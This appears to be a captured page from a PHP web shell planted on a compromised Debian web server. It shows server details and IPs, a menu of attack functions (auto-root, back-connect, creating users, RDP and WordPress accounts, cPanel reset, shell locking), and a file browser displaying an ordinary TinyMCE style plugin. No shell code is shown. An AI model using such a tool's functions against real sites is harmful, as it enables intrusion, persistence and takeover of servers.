Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.211.55
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
leksykografia /
web /
js /
tiny_mce /
plugins /
style /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
langs
[ DIR ]
drwxr-xr-x
editor_plugin.js
1.09
KB
-rw-r--r--
editor_plugin_src.js
1.88
KB
-rw-r--r--
props.htm
36.77
KB
-rw-r--r--
readme.txt
1011
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editor_plugin_src.js
/** * editor_plugin_src.js * * Copyright 2009, Moxiecode Systems AB * Released under LGPL License. * * License: http://tinymce.moxiecode.com/license * Contributing: http://tinymce.moxiecode.com/contributing */ (function() { tinymce.create('tinymce.plugins.StylePlugin', { init : function(ed, url) { // Register commands ed.addCommand('mceStyleProps', function() { var applyStyleToBlocks = false; var blocks = ed.selection.getSelectedBlocks(); var styles = []; if (blocks.length === 1) { styles.push(ed.selection.getNode().style.cssText); } else { tinymce.each(blocks, function(block) { styles.push(ed.dom.getAttrib(block, 'style')); }); applyStyleToBlocks = true; } ed.windowManager.open({ file : url + '/props.htm', width : 480 + parseInt(ed.getLang('style.delta_width', 0)), height : 340 + parseInt(ed.getLang('style.delta_height', 0)), inline : 1 }, { applyStyleToBlocks : applyStyleToBlocks, plugin_url : url, styles : styles }); }); ed.addCommand('mceSetElementStyle', function(ui, v) { if (e = ed.selection.getNode()) { ed.dom.setAttrib(e, 'style', v); ed.execCommand('mceRepaint'); } }); ed.onNodeChange.add(function(ed, cm, n) { cm.setDisabled('styleprops', n.nodeName === 'BODY'); }); // Register buttons ed.addButton('styleprops', {title : 'style.desc', cmd : 'mceStyleProps'}); }, getInfo : function() { return { longname : 'Style', author : 'Moxiecode Systems AB', authorurl : 'http://tinymce.moxiecode.com', infourl : 'http://wiki.moxiecode.com/index.php/TinyMCE:Plugins/style', version : tinymce.majorVersion + "." + tinymce.minorVersion }; } }); // Register plugin tinymce.PluginManager.add('style', tinymce.plugins.StylePlugin); })();
Close